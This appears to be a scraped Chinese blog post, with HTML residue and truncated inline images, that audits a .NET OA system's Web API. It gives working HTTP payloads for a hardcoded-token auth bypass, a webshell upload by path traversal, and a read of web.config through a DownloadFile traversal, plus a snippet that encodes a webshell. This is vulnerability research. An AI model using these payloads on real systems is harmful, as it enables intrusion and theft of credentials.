Content-Length: 1926

token=zxh&amp;FileName=/../../manager/a.aspx&amp;pathType=1&amp;fs=[60,37,64,...]
```

通过路由`/api/files/UploadFile`锁定`WebApi.Areas.Api.Controllers.filesController.UploadFile`方法

![image-20240117151647439](https://shs3.b.qianxin.com/butian_public/f374912acf8051c0743e69abf12b7cd5a3311ce024ea4.jpg)

在这个方法中接受四个参数，分别为token,fs,FileName,pathType。

首先会经过`base.IsAuthorityCheck()`进行鉴权

![image-20240117151918695](https://shs3.b.qianxin.com/butian_public/f828859d679c9c3d0b76df0a45d180f7496f52a1e20bc.jpg)

这里的`byValue`通过参数`token`获得，并且这里判断的内容直接被硬编码，所以直接`token=zxh`即可`return new UserInfo();`

接着返回UploadFile方法看fs

```php
fs = JsonConvert.DeserializeObject&lt;byte[]&gt;(base.getByValue("fs"));
```

`JsonConvert.DeserializeObject&lt;byte[]&gt;` 是使用 Json.NET 库（Newtonsoft.Json）中的 `JsonConvert` 类来将 JSON 字符串反序列化为 `byte[]` 数组的过程。所以这里只需要传入一个数组就可以了

![image-20240117162553752](https://shs3.b.qianxin.com/butian_public/f373592e7614fb52500edbc5c3c0e25a0df55cac2c532.jpg)

因在在最后的`SingleBase&lt;fileServices&gt;.Instance.UploadFile(fs, FileName, pathType)`中

![image-20240117160455901](https://shs3.b.qianxin.com/butian_public/f550497bc21dc250e88f5ad75a4505b1efdfa6a97297a.jpg)

会直接将byte类型直接通过`WriterTo`写入，所以可以用python生成一个webshell的字节数据

```php
webshell = '&lt;%now()%&gt;'
print(str([ord(x) for x in webshell]).replace(' ', ''))
```

![image-20240117161828039](https://shs3.b.qianxin.com/butian_public/f22501849a2aeae9eb05656e65ff76332a3fb01623083.jpg)

然后在看写入的路径

![image-20240117160642227](https://shs3.b.qianxin.com/butian_public/f5582078fddd40ce9ad9f81e2e704a162f6e200034e31.jpg)

写入的路径是通过传入的`pathType`决定的，在`GetFolderPathByType`中定义了`pathType`的值对应的路径

![image-20240117160727483](https://shs3.b.qianxin.com/butian_public/f42722070b266fabab3f4e4ee8c259d9431cead1a0a4d.jpg)

在`web.config`中定义了各个值对应的路径，但是程序实在manage里，如果上传到这些目录也无法访问到

![image-20240117160937318](https://shs3.b.qianxin.com/butian_public/f56758683e4feb8c5b4e57704d9315b74fecc13dd5e6a.jpg)

所以这里的FileName需要通过路径穿越到web目录。最后`memoryStream.WriteTo(fileStream);`将webshell写入

0x03 more
=========

1、任意文件写入
--------

在分析这个漏洞的时候，发现在这个控制器下还有四个类似上传方法

![image-20240117172054824](https://shs3.b.qianxin.com/butian_public/f955996b6bea1c71ef935bd5a3a37e081bab6dbb9431e.jpg)

这里找到一处UploadFile2，这里获取路径的方式是通过pathType控制，但是多了两个参数startPoint和dataSize

![image-20240117173215411](https://shs3.b.qianxin.com/butian_public/f263863c4cde1de723ce0740f0799e5199a87c239c705.jpg)

这里会判断startPoint是否为0，如果0就直接写入文件，如果不为0，则需要被写入的文件存在，且startPoint的值必须为被写入文件的长度，然后通过append追加的方式写入，然后datasize是写入的位数，需要与写入文件的字符个数相同。

![image-20240117173206283](https://shs3.b.qianxin.com/butian_public/f7352808714f27303e58365800e48c0378e95aa3f5919.jpg)

payload就不放了，能看懂的人自然能构建出来，后面的`UploadBillFile2`原理也是一样的，只不过是上传的路径变了，依然可以利用文件名进行目录穿梭上传到web目录下。

![image-20240117174128940](https://shs3.b.qianxin.com/butian_public/f56606259500bfbc9c087eff7e7394751b9683487de4d.jpg)

接着看下一处，但是这里鸡肋，因为这里的路径是通过`Path.GetTempPath()`获取的，也就是说只能上传到`%TMP%`目录下，但依然可以路径穿越到启动目录上传木马等。

![image-20240117172955317](https://shs3.b.qianxin.com/butian_public/f6824005dbec347c7edb003a80c5f02ba0eee036ba4ce.jpg)

2、任意文件读取
--------

![image-20240118144955838](https://shs3.b.qianxin.com/butian_public/f131143792992fa40beaadf9ebe18d90ca5b68fd84456.jpg)

同样在files控制器中，我们发现了很多与下载相关的接口，并且都是通过硬编码进行鉴权的。

![image-20240118145100494](https://shs3.b.qianxin.com/butian_public/f623654dacec73876098c29eda9084bc429b4f0b157bc.jpg)

例如这个接口，获取两个参数requestFileName和pathType

![image-20240118145152494](https://shs3.b.qianxin.com/butian_public/f97812861a764160ab8aaaa625a6b98d478cc1bf0a6b0.jpg)

pathType同样是选择不同的路径，可以用requestFileName进行路径穿越读到我们想要的文件

payload:

```php
POST /api/files/DownloadFile HTTP/1.1

token=zxh&amp;requestFileName=../../manager/web.config&amp;pathType=1
```</textarea>
 <div id=layer-photos-demo>
 <div id=md_view><div class=markdown-body><p blockindex=0>前段时间看到公开了一个漏洞payload很奇怪，正好有空就分析了一下，也是第一次接触了.net的代码审计，一通分析下来，发现和审计java和php的思路是一样的...</p>
<p blockindex=1>在拿到源码后，发现这个oa是用.net编写的，基本所有的预编译的ASP.NET的Web应用程序使用的.Net程序集（通常是DLLs）都默认放在<code>bin</code>文件下，这一点和java写的程序中将jar都放在<code>WEB-INF/lib</code>中类似。.NET的DLL和Java的JAR都是用于打包和分发代码的文件格式。.NET的DLL是用于.NET Framework的动态链接库，而Java的JAR是用于Java平台的Java归档文件。</p>
<p blockindex=2>通常反编译.net的工具dnSpy, ILSpy等，但是由于ILSpy一直在维护更新，大部分人都偏向于使用这个，虽然dnSpy工具以及在2020年已经归档，但是在github通过<code>dnspy fork:only</code>搜索到仍有非官方的爱好者对该工具进行维护，例如项目地址:<a href=https://github.com/dnSpyEx/dnSpy>dnSpy</a>。</p>
<h1 blockindex=3>0x01 路由分析</h1>
<p blockindex=4>首先查看<code>Global.asax</code>，他 是 ASP.NET 应用程序中的一个文件，它作为处理应用程序级事件和自定义应用程序行为的中心位置。通常被称为全局应用程序类。其中的<code>Inherits</code>中定义了定义供页继承的代码隐藏类</p>
<p blockindex=5><img src=data:image/png;base64,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
<p blockindex=6>然后再dnSpy中搜索这个类目（最好打开全词匹配排除其他干扰项），然后在<code>Application_Start</code>中定义了在应用程序启动时运行的代码</p>
<p blockindex=7><img src=data:image/png;base64,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
<p blockindex=8>通过<code>WebApiConfig.Register</code>可以看到这里定义了通过api访问的路由，定义了包含控制器和方法</p>
<p blockindex=9>在 ASP.NET Web API 中，<em>控制器</em>是处理 HTTP 请求的类。控制器的公共方法称为<em>操作方法</em>或简称为<em>action</em>。当 Web API 框架收到请求时，它将请求路由到操作。</p>
<p blockindex=10><img src="data:image/png;base64,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
<p blockindex=11>然后在<code>WebApi.Areas.Api.Controllers</code>命名空间中寻找到所有控制器和方法</p>
